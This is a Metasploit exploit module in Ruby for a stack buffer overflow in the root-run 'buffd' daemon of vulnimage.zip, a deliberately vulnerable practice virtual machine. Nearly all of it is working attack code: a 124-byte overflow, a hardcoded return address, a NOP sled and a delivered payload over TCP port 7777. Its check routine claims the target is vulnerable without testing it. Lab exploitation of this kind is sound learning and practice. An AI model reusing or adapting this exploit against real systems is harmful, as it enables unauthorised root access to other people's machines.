# Template: http://dev.metasploit.com/redmine/projects/framework/wiki/DeveloperGuide#A23-Exploit require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'VulnImage.zip Stack Buffer Overflow (\'buffd\' Daemon)', 'Description' => %q{ A simple exploit for the 'boot to root', vulnimage.zip. The vulnerability is in daemon service, 'buffd', which runs as root at startup. }, 'License' => MSF_LICENSE, 'Author' => [ 'g0tmi1k' ], 'Version' => '$Revision: 1 $', 'References' => [ [ 'Download', 'http://ds.mathematik.uni-marburg.de/~lbaumgaertner/vulnimage.zip' ], ], 'Payload' => { 'Space' => 672, 'BadChars' => "\x00\xff", }, 'Platform' => 'lin', 'Targets' => [ [ 'VulnImage.zip Virtual Machine',{'Ret' => 0xbffff380, } ] # Direct address (NOP sled!) ], 'Privileged' => false, 'DisclosureDate' => 'Nov 17 2011', 'DefaultOptions' => { 'RPORT' => '7777', 'EXITFUNC' => 'process', }, 'DefaultTarget' => 0, 'Privileged' => false )) end def check return Exploit::CheckCode::Vulnerable # Will always return true end def exploit connect # Feedback to user print_status("Sending #{payload.encoded.length} byte payload...") # Crafting exploit buf = "A" * 124 buf += [ target.ret ].pack('V') buf += make_nops(30) buf += payload.encoded # Sending exploit! sock.put(buf) sock.get handler disconnect end end